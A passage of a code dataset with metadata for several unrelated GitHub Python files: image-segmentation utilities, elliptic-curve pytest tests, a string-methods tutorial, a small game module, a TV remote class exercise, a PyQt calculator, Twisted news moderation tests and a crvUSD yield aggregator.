= i+1\n pred_tensor[:,:,:,i] = pred_tensor[:,:,:,i] * j\n \n pred_tensor = np.sum(pred_tensor, axis=-1)\n return pred_tensor \n\ndef plot_confusion_matrix(cm, class_names, normalize = True, show_text = True, from_clf = False, my_cmap = 'Greens'):\n '''\n Parameters\n ----------\n cm : a nxn dim numpy array.\n class_names: a list of class names (str type)\n normalize: whether to normalize the values\n show_text: whether to show value in each block of the matrix, If matrix is large like 10x10 or 20x20 it's better to set it to false\n because it'll be difficult to read values but you can see the network behaviour via color map.\n show_fpfn: whether to show false positives on GT axis and false negatives on Pred axis. FN -> not detected & FP -> wrong detections\n Returns\n -------\n fig: a plot of confusion matrix along with colorbar\n '''\n if from_clf:\n conf_mat = cm\n x_labels = copy.deepcopy(class_names)\n y_labels = copy.deepcopy(class_names)\n else:\n conf_mat = cm[1:, 1:]\n x_labels = class_names\n y_labels = class_names \n \n c_m = conf_mat\n \n if normalize:\n row_sums = c_m.sum(axis=1)\n c_m = c_m / row_sums[:, np.newaxis]\n c_m = np.round(c_m, 3)\n \n fig, ax = plt.subplots(figsize=(len(class_names)+3, len(class_names)+3))\n im = ax.imshow(c_m, cmap = my_cmap) \n \n # We want to show all ticks...\n ax.set_xticks(np.arange(len(y_labels)))\n ax.set_yticks(np.arange(len(x_labels)))\n # ... and label them with the respective list entries\n ax.set_xticklabels(y_labels)\n ax.set_yticklabels(x_labels)\n \n # Rotate the tick labels and set their alignment.\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\", rotation_mode=\"anchor\")#ha=right\n \n if show_text:\n for i in range(len(x_labels)):\n for j in range(len(y_labels)):\n text = ax.text(j, i, c_m[i, j], color=\"k\", ha=\"center\", va=\"center\")#color=clr_select(i, j)\n \n ax.set_title(\"Normalized Confusion Matrix\")\n fig.tight_layout()\n plt.xlabel('Predicted Labels')\n plt.ylabel('True Labels')\n sm = plt.cm.ScalarMappable(cmap=my_cmap, norm=plt.Normalize(vmin=0, vmax=1))\n sm._A = []\n plt.colorbar(sm)\n plt.show() \n return fig \n\ndef water(img, mask):\n '''\n Parameters\n ----------\n img : 3D array, RGB iamge [H W 3]\n mask : 2D array, semantic/binary segmentaion mask [H W]\n\n Returns\n -------\n img : RGB image wiht overlayd boundry instances\n new : instacnes boundaries\n '''\n img = (img).astype(np.uint8)\n mask = (mask).astype(np.uint8)\n original_image = np.copy(img)\n \n # apply threshold to converto sem-mask to binary mask\n ret, thresh = cv2.threshold(mask, 0, 255, cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n # so that BG pixel have 0 value and FG will have 255 value\n thresh = 255 - thresh\n \n # noise removal\n kernel = np.ones((3,3),np.uint8)\n opening = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel, iterations = 2)\n \n # sure background area\n sure_bg = cv2.dilate(opening,kernel,iterations=3)\n \n # Finding sure foreground area\n dist_transform = cv2.distanceTransform(opening, cv2.DIST_L2, 5)\n # Normalize the distance image for range = {0.0, 1.0}\n # so we can visualize and threshold it \n dist_transform = cv2.normalize(dist_transform, dist_transform, 0, 1.0, cv2.NORM_MINMAX)\n _, sure_fg = cv2.threshold(dist_transform, 0.4, 1.0, cv2.THRESH_BINARY)\n #ret, sure_fg = cv2.threshold(dist_transform, 0.7*dist_transform.max(), 255, 0)\n \n # Finding unknown region\n sure_fg = np.uint8(sure_fg)\n unknown = cv2.subtract(sure_bg,sure_fg)\n \n # Marker labelling\n ret, markers = cv2.connectedComponents(sure_fg)\n # Add one to all labels so that sure background is not 0, but 1\n markers = markers+1\n # Now, mark the region of unknown with zero\n markers[unknown==255] = 0\n \n # remove bg form the image so that water shed will only focus on cells\n img[thresh==0]=1\n \n markers = markers.astype('int32')\n markers = cv2.watershed(img, markers)\n # draw boundaries on real iamge\n original_image[markers == -1] = [255,0,0]\n # draw boundary on empty convas\n new = np.zeros(img.shape)\n new[markers == -1] = [255, 255, 255]\n new = (new).astype(np.uint8)\n new = cv2.cvtColor(new, cv2.COLOR_BGR2GRAY)\n new = (new/255).astype(np.uint8)\n return original_image, new\n\n\ndef sigmoid_activation(pred):\n pred = tf.convert_to_tensor(pred)\n active_preds = tf.keras.activations.sigmoid(pred)\n if tf.executing_eagerly()==False:\n sess = tf.compat.v1.Session()\n active_preds = sess.run(active_preds)\n else:\n active_preds = active_preds.numpy()\n \n return active_preds\n\ndef softmax_activation(pred):\n pred = tf.convert_to_tensor(pred)\n active_preds = tf.keras.activations.softmax(pred, axis=-1)\n if tf.executing_eagerly()==False:\n sess = tf.compat.v1.Session()\n active_preds = sess.run(active_preds)\n else:\n active_preds = active_preds.numpy()\n \n return active_preds","repo_name":"Mr-TalhaIlyas/TSFD","sub_path":"slide_inference/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":26272,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"16"}
+{"seq_id":"34099645123","text":"import pytest\nfrom keum import FiniteField, PrimeFiniteField\nfrom keum import (\n babyjubjub,\n secp256k1,\n secp256r1,\n pallas,\n vesta,\n tweedledee,\n tweedledum,\n bn254,\n grumpkin,\n)\n\n\n@pytest.fixture(\n params=[\n secp256k1.AffineWeierstrass,\n secp256r1.AffineWeierstrass,\n pallas.AffineWeierstrass,\n pallas.ProjectiveWeierstrass,\n bn254.AffineWeierstrass,\n grumpkin.AffineWeierstrass,\n tweedledee.AffineWeierstrass,\n tweedledum.AffineWeierstrass,\n vesta.AffineWeierstrass,\n ]\n)\ndef Ec(request):\n return request.param\n\n\n@pytest.fixture(\n params=[\n pallas.ProjectiveWeierstrass,\n ]\n)\ndef ProjectiveEc(request):\n return request.param\n\n\n@pytest.fixture(\n params=[\n secp256k1.AffineWeierstrass,\n secp256r1.AffineWeierstrass,\n pallas.AffineWeierstrass,\n bn254.AffineWeierstrass,\n grumpkin.AffineWeierstrass,\n tweedledee.AffineWeierstrass,\n tweedledum.AffineWeierstrass,\n vesta.AffineWeierstrass,\n ]\n)\ndef AffineEc(request):\n return request.param\n\n\ndef test_affine_random_is_on_the_curve(AffineEc):\n a = AffineEc.random()\n assert AffineEc.is_on_curve(a.x, a.y)\n\n\n# def test_affine_encoding_decoding(AffineEc):\n# a = AffineEc.random()\n# assert AffineEc.of_be_bytes_exn(a.to_be_bytes()) == a\n# assert AffineEc.of_be_bytes_opt(a.to_be_bytes()) == a\n\n\ndef test_projective_encoding_decoding(ProjectiveEc):\n a = ProjectiveEc.random()\n assert ProjectiveEc.of_be_bytes_exn(a.to_be_bytes()) == a\n assert ProjectiveEc.of_be_bytes_opt(a.to_be_bytes()) == a\n\n\ndef test_affine_generator_is_on_curve(AffineEc):\n g = AffineEc.generator()\n assert AffineEc.is_on_curve(g.x, g.y)\n\n\ndef test_projective_random_is_on_the_curve(ProjectiveEc):\n a = ProjectiveEc.random()\n assert ProjectiveEc.is_on_curve(x=a.x, y=a.y, z=a.z)\n\n\ndef test_projective_generator_is_on_curve(ProjectiveEc):\n g = ProjectiveEc.generator()\n assert ProjectiveEc.is_on_curve(x=g.x, y=g.y, z=g.z)\n\n\ndef test_zero_is_identity_for_addition(Ec):\n a = Ec.random()\n zero = Ec.zero()\n assert a + zero == a\n assert zero + a == a\n\n\ndef test_equality_handles_zero(Ec):\n a = Ec.random()\n zero = Ec.zero()\n assert a != zero\n assert Ec.zero() == Ec.zero()\n\n\ndef test_negate_identity(Ec):\n assert Ec.zero().negate() == Ec.zero()\n\n\ndef test_negate(Ec):\n a = Ec.random()\n assert a == a.negate().negate()\n\n\ndef test_addition_support_same_points(Ec):\n p = Ec.random()\n assert p + p == p.double()\n\n\ndef test_affine_addition_of_two_points_is_on_the_curve(AffineEc):\n p1 = AffineEc.random()\n p2 = AffineEc.random()\n p = p1 + p2\n assert AffineEc.is_on_curve(x=p.x, y=p.y)\n\n\ndef test_projective_addition_of_two_points_is_on_the_curve(ProjectiveEc):\n p1 = ProjectiveEc.random()\n p2 = ProjectiveEc.random()\n p = p1 + p2\n assert ProjectiveEc.is_on_curve(x=p.x, y=p.y, z=p.z)\n\n\ndef test_mul_zero_gives_identity(Ec):\n p = Ec.random()\n assert p.mul(Ec.Fr(0)) == Ec.zero()\n\n\ndef test_mul_one_gives_same_point(Ec):\n p = Ec.random()\n assert p.mul(Ec.Fr(1)) == p\n\n\ndef test_mul_by_two_gives_double(Ec):\n p = Ec.random()\n assert p.mul(Ec.Fr(2)) == p.double()\n\n\ndef test_add_is_commutative(Ec):\n p1 = Ec.random()\n p2 = Ec.random()\n lhs = p1 + p2\n rhs = p2 + p1\n assert lhs == rhs\n\n\ndef test_distributivity_scalar_multiplication(Ec):\n a = Ec.Fr.random()\n p1 = Ec.random()\n p2 = Ec.random()\n lhs = (p1 + p2).mul(a)\n rhs = p1.mul(a) + p2.mul(a)\n assert lhs == rhs\n","repo_name":"dannywillems/py-keum","sub_path":"tests/test_ec.py","file_name":"test_ec.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"74874877767","text":"'92'.zfill(5)\n# '00092'\n\n'9123'.zfill(5)\n# '09123'\n\nmsg = 'Hello world!'\nmsg.count('l')\n# 3\n\nmsg.endswith('!')\n# True\n\nmsg.startswith('L')\n# False\n\nmsg.find('w')\n# 7\n\n'hello4'.isdigit()\n# False\n\n'4'.isdigit()\n# True\n\nmsgList = ['hello','world','test']\n\"-\".join(msgList)\n# 'hello-world-test'\n\n\"LOL\".lower()\n# 'lol'\n\n\"lololol\".upper()\n# 'LOLOLOL\n\n'mr Potato'.capitalize()\n# 'Mr Potato'\n\n\"LOL\".isupper()\n# True\n\n'lol'.isupper()\n# False\n\nvegs = 'tomato-potato-carrot'\nvegs.replace('-','=')\n# tomato=potato=carrot\n\nvegs.replace('-','=',1)\n# tomato=potato-carrot\n\ntext = \"I admire you so much\"\ntext.replace(' ','...')\n# 'I...admire...you...so...much'\n\nanimals = \"goats,chickens,ducks,pigs,alpacas\"\nanimals.split(',')\n# ['goats','chickens','ducks','pigs','alpacas']\n\n\"\"\"\nHello\nI\nSee\nYou\"\"\".splitlines()\n# ['','Hello','I','See','You']\n\nuser_input = ' catlady '\nuser_input.strip()\n# 'catlady'\n\nuser_input2 = ' ca t l a dy '\nuser_input2.strip()\n# 'ca t l a dy'\n# doesn't remove the spaces in between the chars","repo_name":"khelyorbek/Learning","sub_path":"18_Python/18_2_Python Data Structures/7_string_methods.py","file_name":"7_string_methods.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"41880483578","text":"\"\"\"Defending the earth mother.\"\"\"\nfrom __future__ import print_function\n\nimport numpy as np\n\nimport grimoire\nfrom utils import inventories\n\nP = np.exp(-np.log(2.0)/52.0)\n\"\"\"Cone survival probability per week\"\"\"\n\ndef drop(trans):\n \"\"\"Drops magic cones, maybe.\"\"\"\n spells = list(grimoire.SPELLBOOK.keys())\n nspells = len(spells)\n hist = trans['history']\n invs = inventories(trans)\n for player, inv in invs.items():\n p = np.random.rand()\n cones = inv['cones']\n if (cones <= 512 and p <= cones / 1024.0) or \\\n (cones > 512 and p <= cones / 2.0**(int(np.log2(cones)) + 2)):\n hist.append({'player': player, 'kind': 'drop', \n 'magic': {spells[np.random.randint(0, nspells)]: 1}})\n\ndef decay(trans):\n \"\"\"Decays cones weekly - you must stay active!\"\"\"\n hist = trans['history']\n invs = inventories(trans)\n for player, inv in invs.items():\n p = np.random.rand()\n cones = inv['cones']\n # trick to obtain average decay behaviour, even in small samples, \n # without having to roll for each cone individually.\n q, r = divmod(cones*P, 1)\n n = int(q) + int(p <= r)\n if n != cones:\n hist.append({'player': player, 'kind': 'decay', 'cones': n - cones})\n \n \n ","repo_name":"pyne/magic-cones","sub_path":"gaia.py","file_name":"gaia.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"43931810327","text":"import time\nimport random\nimport msvcrt\n\nclass Kumanda():\n def __init__(self,televizyon_durumu = \"Kapalı\",ses_düzeyi = 0,kanal_listesi = [\"TRT\"],açık_kanal = \"TRT\"):\n print(\"Televizyon oluşturuluyor...\")\n self.televizyon_durumu = televizyon_durumu\n self.ses_düzeyi = ses_düzeyi\n self.kanal_listesi = kanal_listesi\n self.açık_kanal = açık_kanal\n def sesi_düzenle(self):\n while True:\n karakter = input(\"Sesi artırmak için'Arttır'\\nSesi azaltmak için'Azalt'\\nÇıkmak için 'çıkış' yazınız.\\nSeçim:\")\n if (karakter == \"Arttır\"):\n while True:\n x = int(input(\"Arttırmak istediğiniz miktarı giriniz:\\n\"))\n if (x < 0):\n print(\"Böyle bir sayı arttıramazsınız...\")\n elif(x > 0):\n self.ses_düzeyi += x\n break\n else:\n print(\"Ses düzeyi sabit kaldı...\")\n break\n elif (karakter == \"Azalt\"):\n while True:\n y = int(input(\"Azaltmak istediğiniz miktarı giriniz:\\n\"))\n if (y < 0):\n print(\"Böyle bir sayı kadar azaltamazsınız...\")\n elif (y > 0):\n self.ses_düzeyi -= y\n break\n else:\n print(\"Ses düzeyi sabit kaldı...\")\n break\n elif (karakter == \"çıkış\"):\n print(\"Komut alındı\")\n time.sleep(0.5)\n print(\"Çıkış yapılıyor\")\n break\n else:\n print(\"Geçersiz işlem\")\n def tv_kapat(self):\n if (self.televizyon_durumu == \"Kapalı\"):\n print(\"Televizyon zaten kapalı....\")\n else:\n print(\"Tv Kapatılıyor...\")\n time.sleep(0.5)\n print(\"Tv kapatıldı...\")\n self.televizyon_durumu = \"Kapalı\"\n def tv_aç(self):\n if (self.televizyon_durumu == \"Açık\"):\n print(\"Televizyon zaten açık...\")\n else:\n print(\"Televizyon açılıyor...\")\n time.sleep(0.5)\n print(\"Televizyon açıldı....\")\n self.televizyon_durumu = \"Açık\"\n def __str__(self):\n return \"TV durumu:{}\\nSes düzeyi:{}\\nKanal Listesi:{}\\nAçık kanal:{}\".format(self.televizyon_durumu,self.ses_düzeyi,self.kanal_listesi,self.açık_kanal)\n def __len__(self):\n return len(self.kanal_listesi)\n def rastgele_kanal(self):\n rastgele = random.randint(0, len(self.kanal_listesi) - 1)\n self.açık_kanal = self.kanal_listesi[rastgele]\n print(\"Şuan açık kanal:\",self.açık_kanal)\n def kanal_ekle(self,kanal):\n print(\"Kanal eklendi:\",kanal)\n self.kanal_listesi.append(kanal)\nkumanda = Kumanda()\nprint(\"\"\"*******************\n\nTelevizyon Uygulaması\n\nİşlemler ;\n\n1. Televizyonu Aç\n\n2. Televizyonu Kapat\n\n3. Televizyon Bilgileri\n\n4. Kanal Sayısını Öğrenme\n\n5. Kanal Ekle\n\n6. Rastgele Kanal'a Geç\n\n7. Sesi Düzenle\n\nÇıkmak için 'Çıkış' yazın.\n*******************\"\"\")\nwhile True:\n işlem = input(\"Lütfen gireceğiniz işlemi seçiniz:\")\n if (işlem == \"1\"):\n kumanda.tv_aç()\n elif(işlem == \"2\"):\n kumanda.tv_kapat()\n elif(işlem == \"3\"):\n print(kumanda)\n elif(işlem == \"4\"):\n if (kumanda.televizyon_durumu == \"Kapalı\"):\n print(\"Televizyon Kapalı Olduğu İçin Bu İşlemi Yapamazsınız...\")\n else:\n print(\"Kanal sayısı :\", len(kumanda))\n elif(işlem == \"5\"):\n if (kumanda.televizyon_durumu == \"Kapalı\"):\n print(\"Televizyon Kapalı Olduğu İçin Bu İşlemi Yapamazsınız...\")\n else:\n kanallar = input(\"Eklemek İstediğiniz Kanalları ',' ile ayırarak girin:\")\n eklenecekler = kanallar.split(\",\")\n for i in eklenecekler:\n kumanda.kanal_ekle(i)\n print(\"Kanal Listesi başarıyla güncellendi...\")\n elif (işlem == \"6\"):\n if (kumanda.televizyon_durumu == \"Kapalı\"):\n print(\"Televizyon Kapalı Olduğu İçin Bu İşlemi Yapamazsınız...\")\n else:\n kumanda.rastgele_kanal()\n elif(işlem == \"7\"):\n if (kumanda.televizyon_durumu == \"Kapalı\"):\n print(\"Televizyon Kapalı Olduğu İçin Bu İşlemi Yapamazsınız...\")\n else:\n kumanda.sesi_düzenle()\n elif(işlem == \"Çıkış\"):\n print(\"Çıkış yapılıyor...%\",random.randint(0,50))\n time.sleep(1)\n print(\"Çıkış yapılıyor...%\", random.randint(50,99))\n time.sleep(1)\n print(\"Çıkış yapılıyor...½100\")\n time.sleep(1)\n print(\"Çıkış yapıldı...\")\n break\n else:\n print(\"Böyle bir işlem yapamazsınız!\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"oayk23/python_repository","sub_path":"kumanda.py","file_name":"kumanda.py","file_ext":"py","file_size_in_byte":4989,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"5102580490","text":"import os\r\nimport sys\r\nimport math\r\nfrom PyQt5 import QtCore, QtGui, uic, QtWidgets\r\nfrom functools import partial\r\n\r\nqtCreatorFile = \"AppGui.ui\"\r\nif os.path.isfile ( qtCreatorFile ):\r\n\t# Use AppGui.ui file for debug\r\n\tUi_MainWindow, QtBaseClass = uic.loadUiType ( qtCreatorFile )\r\nelse:\r\n\t# Use converted AppGui.py file for release\r\n\tfrom AppGui import Ui_MainWindow\r\n\r\n\r\nclass Calculator ( QtWidgets.QMainWindow, Ui_MainWindow ):\r\n\t'''\r\n\tCalculator application.\r\n\t'''\r\n\tdef __init__ ( self ):\r\n\t\tQtWidgets.QMainWindow.__init__ ( self )\r\n\t\tUi_MainWindow.__init__ ( self )\r\n\t\tself.setupUi ( self )\r\n\t\tself.setWindowFlags ( QtCore.Qt.Window | QtCore.Qt.CustomizeWindowHint | QtCore.Qt.WindowTitleHint |\r\n\t\t QtCore.Qt.WindowCloseButtonHint | QtCore.Qt.WindowStaysOnTopHint |\r\n\t\t QtCore.Qt.WindowMinimizeButtonHint | QtCore.Qt.WindowMaximizeButtonHint )\r\n\r\n\t\tself.listButtons = [ self.btn0, self.btn1, self.btn2, self.btn3,\r\n\t\t\t\t\t\t\t self.btn4, self.btn5, self.btn6, self.btn7,\r\n\t\t\t\t\t\t\t self.btn8, self.btn9, self.btnDot,\r\n\t\t\t\t\t\t\t self.btnPlus, self.btnMinus, self.btnMultiply, self.btnDivide,\r\n\t\t\t\t\t\t\t self.btnDel, self.btnAc, self.btnEqual, self.btnSquareRoot ]\r\n\r\n\t\tfor index in range ( 15 ):\r\n\t\t\t# for some reason, lamda doesn't work here but partial works\r\n\t\t\t#self.listButtons [ index ].clicked.connect ( lambda: self.cbBtnNumberClicked ( self.listButtons [ index ].text () ) )\r\n\t\t\tself.listButtons [ index ].clicked.connect ( partial ( self.cbBtnNumberClicked, self.listButtons [ index ].text () ) )\r\n\r\n\t\tself.btnDel.clicked.connect ( self.cbBtnDelClicked )\r\n\t\tself.btnAc.clicked.connect ( self.cbBtnAcClicked )\r\n\t\tself.btnEqual.clicked.connect ( self.cbBtnEqualClicked )\r\n\t\tself.btnSquareRoot.clicked.connect ( self.cbBtnSquareRootClicked )\r\n\r\n\tdef cbBtnNumberClicked ( self, text ):\r\n\t\tcurrent_value = self.txtResult.text ()\r\n\t\tnew_value = current_value + str ( text )\r\n\t\tself.txtResult.setText ( new_value )\r\n\r\n\tdef cbBtnEqualClicked ( self ):\r\n\t\tresult = eval ( self.txtResult.text () )\r\n\t\tself.txtResult.setText ( str ( result ) )\r\n\r\n\tdef cbBtnAcClicked ( self ):\r\n\t\tself.txtResult.setText ( \"\" )\r\n\r\n\tdef cbBtnDelClicked ( self ):\r\n\t\tcurrent_value = self.txtResult.text ()\r\n\t\tself.txtResult.setText ( current_value[:-1] )\r\n\r\n\tdef cbBtnSquareRootClicked ( self ):\r\n\t\tvalue = float ( self.txtResult.text () )\r\n\t\tself.txtResult.setText ( str ( math.sqrt ( value ) ) )\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tapp = QtWidgets.QApplication(sys.argv)\r\n\twindow = Calculator()\r\n\twindow.show()\r\n\tsys.exit(app.exec_())\r\n","repo_name":"ylyang-dev/Calculator","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"71710699848","text":"__metaclass__ = type\n\nfrom email.Parser import Parser\nfrom socket import gethostname\n\nfrom twisted.trial.unittest import TestCase\nfrom twisted.internet.defer import succeed\nfrom twisted.mail.smtp import messageid\nfrom twisted.news.database import Article, PickleStorage, NewsShelf\n\n\n\nclass ModerationTestsMixin:\n \"\"\"\n Tests for the moderation features of L{INewsStorage} implementations.\n \"\"\"\n def setUp(self):\n self._email = []\n\n\n def sendmail(self, smtphost, from_addr, to_addrs, msg,\n senderDomainName=None, port=25):\n \"\"\"\n Fake of L{twisted.mail.smtp.sendmail} which records attempts to send\n email and immediately pretends success.\n\n Subclasses should arrange for their storage implementation to call this\n instead of the real C{sendmail} function.\n \"\"\"\n self._email.append((\n smtphost, from_addr, to_addrs, msg, senderDomainName, port))\n return succeed(None)\n\n\n _messageTemplate = \"\"\"\\\nFrom: some dude\nTo: another person\nSubject: activities etc\nMessage-ID: %(articleID)s\nNewsgroups: %(newsgroup)s\n%(approved)s\nBody of the message is such.\n\"\"\".replace('\\n', '\\r\\n')\n\n\n def getApprovedMessage(self, articleID, group):\n \"\"\"\n Return a C{str} containing an RFC 2822 formatted message including an\n I{Approved} header indicating it has passed through moderation.\n \"\"\"\n return self._messageTemplate % {\n 'articleID': articleID,\n 'newsgroup': group,\n 'approved': 'Approved: yup\\r\\n'}\n\n\n def getUnapprovedMessage(self, articleID, group):\n \"\"\"\n Return a C{str} containing an RFC 2822 formatted message with no\n I{Approved} header indicating it may require moderation.\n \"\"\"\n return self._messageTemplate % {\n 'articleID': articleID,\n 'newsgroup': group,\n 'approved': '\\r\\n'}\n\n\n def getStorage(self, groups, moderators, mailhost, sender):\n \"\"\"\n Override in a subclass to return a L{INewsStorage} provider to test for\n correct moderation behavior.\n\n @param groups: A C{list} of C{str} naming the groups which should exist\n in the resulting storage object.\n\n @param moderators: A C{dict} mapping C{str} each group name to a C{list}\n of C{str} giving moderator email (RFC 2821) addresses.\n \"\"\"\n raise NotImplementedError()\n\n\n def test_postApproved(self):\n \"\"\"\n L{INewsStorage.postRequest} posts the message if it includes an\n I{Approved} header.\n \"\"\"\n group = \"example.group\"\n moderator = \"alice@example.com\"\n mailhost = \"127.0.0.1\"\n sender = \"bob@example.org\"\n articleID = messageid()\n storage = self.getStorage(\n [group], {group: [moderator]}, mailhost, sender)\n message = self.getApprovedMessage(articleID, group)\n result = storage.postRequest(message)\n\n def cbPosted(ignored):\n self.assertEqual(self._email, [])\n exists = storage.articleExistsRequest(articleID)\n exists.addCallback(self.assertTrue)\n return exists\n result.addCallback(cbPosted)\n return result\n\n\n def test_postModerated(self):\n \"\"\"\n L{INewsStorage.postRequest} forwards a message to the moderator if it\n does not include an I{Approved} header.\n \"\"\"\n group = \"example.group\"\n moderator = \"alice@example.com\"\n mailhost = \"127.0.0.1\"\n sender = \"bob@example.org\"\n articleID = messageid()\n storage = self.getStorage(\n [group], {group: [moderator]}, mailhost, sender)\n message = self.getUnapprovedMessage(articleID, group)\n result = storage.postRequest(message)\n\n def cbModerated(ignored):\n self.assertEqual(len(self._email), 1)\n self.assertEqual(self._email[0][0], mailhost)\n self.assertEqual(self._email[0][1], sender)\n self.assertEqual(self._email[0][2], [moderator])\n self._checkModeratorMessage(\n self._email[0][3], sender, moderator, group, message)\n self.assertEqual(self._email[0][4], None)\n self.assertEqual(self._email[0][5], 25)\n exists = storage.articleExistsRequest(articleID)\n exists.addCallback(self.assertFalse)\n return exists\n result.addCallback(cbModerated)\n return result\n\n\n def _checkModeratorMessage(self, messageText, sender, moderator, group, postingText):\n p = Parser()\n msg = p.parsestr(messageText)\n headers = dict(msg.items())\n del headers['Message-ID']\n self.assertEqual(\n headers,\n {'From': sender,\n 'To': moderator,\n 'Subject': 'Moderate new %s message: activities etc' % (group,),\n 'Content-Type': 'message/rfc822'})\n\n posting = p.parsestr(postingText)\n attachment = msg.get_payload()[0]\n\n for header in ['from', 'to', 'subject', 'message-id', 'newsgroups']:\n self.assertEqual(posting[header], attachment[header])\n\n self.assertEqual(posting.get_payload(), attachment.get_payload())\n\n\n\nclass PickleStorageTests(ModerationTestsMixin, TestCase):\n \"\"\"\n Tests for L{PickleStorage}.\n \"\"\"\n def getStorage(self, groups, moderators, mailhost, sender):\n \"\"\"\n Create and return a L{PickleStorage} instance configured to require\n moderation.\n \"\"\"\n storageFilename = self.mktemp()\n storage = PickleStorage(\n storageFilename, groups, moderators, mailhost, sender)\n storage.sendmail = self.sendmail\n self.addCleanup(PickleStorage.sharedDBs.pop, storageFilename)\n return storage\n\n\n\nclass NewsShelfTests(ModerationTestsMixin, TestCase):\n \"\"\"\n Tests for L{NewsShelf}.\n \"\"\"\n def getStorage(self, groups, moderators, mailhost, sender):\n \"\"\"\n Create and return a L{NewsShelf} instance configured to require\n moderation.\n \"\"\"\n storageFilename = self.mktemp()\n shelf = NewsShelf(mailhost, storageFilename, sender)\n for name in groups:\n shelf.addGroup(name, 'm') # Dial 'm' for moderator\n for address in moderators.get(name, []):\n shelf.addModerator(name, address)\n shelf.sendmail = self.sendmail\n return shelf\n\n\n def test_notifyModerator(self):\n \"\"\"\n L{NewsShelf.notifyModerator} sends a moderation email to a single\n moderator.\n \"\"\"\n shelf = NewsShelf('example.com', self.mktemp(), 'alice@example.com')\n shelf.sendmail = self.sendmail\n shelf.notifyModerator('bob@example.org', Article('Foo: bar', 'Some text'))\n self.assertEqual(len(self._email), 1)\n\n\n def test_defaultSender(self):\n \"\"\"\n If no sender is specified to L{NewsShelf.notifyModerators}, a default\n address based on the system hostname is used for both the envelope and\n RFC 2822 sender addresses.\n \"\"\"\n shelf = NewsShelf('example.com', self.mktemp())\n shelf.sendmail = self.sendmail\n shelf.notifyModerators(['bob@example.org'], Article('Foo: bar', 'Some text'))\n self.assertEqual(self._email[0][1], 'twisted-news@' + gethostname())\n self.assertIn('From: twisted-news@' + gethostname(), self._email[0][3])\n","repo_name":"Chudry/Xerror","sub_path":"env/lib/python2.7/site-packages/twisted/news/test/test_database.py","file_name":"test_database.py","file_ext":"py","file_size_in_byte":7430,"program_lang":"python","lang":"en","doc_type":"code","stars":477,"dataset":"github-code","pt":"16"}
+{"seq_id":"37659028913","text":"from operator import and_\nfrom typing import List\nimport requests\nfrom sqlalchemy import func\nimport logging\nfrom main import db\nfrom models.convex.snapshot import ConvexPoolSnapshot\nfrom models.curve.crvusd import CrvUsdYield\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_latest_convex_pool_apr() -> List:\n subquery = (\n db.session.query(\n ConvexPoolSnapshot.poolName,\n func.max(ConvexPoolSnapshot.timestamp).label(\"max_timestamp\"),\n )\n .filter(\n ConvexPoolSnapshot.poolName.ilike(\n \"%Curve.fi Factory Plain Pool: crvUSD%\"\n )\n )\n .group_by(ConvexPoolSnapshot.poolName)\n .subquery()\n )\n\n result = (\n db.session.query(\n ConvexPoolSnapshot.baseApr,\n ConvexPoolSnapshot.crvApr,\n ConvexPoolSnapshot.cvxApr,\n ConvexPoolSnapshot.extraRewardsApr,\n ConvexPoolSnapshot.timestamp,\n ConvexPoolSnapshot.poolName,\n )\n .join(\n subquery,\n and_(\n ConvexPoolSnapshot.poolName == subquery.c.poolName,\n ConvexPoolSnapshot.timestamp == subquery.c.max_timestamp,\n ),\n )\n .all()\n )\n\n return [\n CrvUsdYield(\n platform=\"Convex\", pool=r[5], apy=(r[0] + r[1] + r[2] + r[3]) * 100\n )\n for r in result\n ]\n\n\ndef get_max_boost_curve_yield() -> List[CrvUsdYield]:\n CURVE_APR = \"https://www.convexfinance.com/api/curve-apys\"\n r = requests.get(CURVE_APR)\n return [\n CrvUsdYield(\n platform=\"Curve (max boost)\",\n pool=k,\n apy=v[\"crvApy\"] + v[\"baseApy\"],\n )\n for k, v in r.json()[\"apys\"].items()\n if \"factory-crvusd\" in k\n ]\n\n\ndef get_std_yields() -> List[CrvUsdYield]:\n STD_YIELD = \"https://lockers.stakedao.org/api/strategies/cache/curve\"\n r = requests.get(STD_YIELD)\n yields = {\n a[\"name\"]: sum([b[\"apr\"] for b in a[\"aprBreakdown\"]]) * 100\n for a in r.json()\n if \"crvusd\" in a[\"key\"]\n }\n return [\n CrvUsdYield(platform=\"StakeDAO\", pool=k, apy=v)\n for k, v in yields.items()\n ]\n\n\ndef get_crv_usd_yields() -> List[CrvUsdYield]:\n try:\n convex_yields = get_latest_convex_pool_apr()\n except Exception as e:\n logger.error(f\"Error fetching Convex yields : {e}\")\n convex_yields = []\n try:\n curve_yields = get_max_boost_curve_yield()\n except Exception as e:\n logger.error(f\"Error fetching Curve yields : {e}\")\n curve_yields = []\n try:\n std_yields = get_std_yields()\n except Exception as e:\n logger.error(f\"Error fetching StakeDAO yields : {e}\")\n std_yields = []\n\n return convex_yields + curve_yields + std_yields\n","repo_name":"convex-community/subgraphs-api","sub_path":"app/services/curve/yields.py","file_name":"yields.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
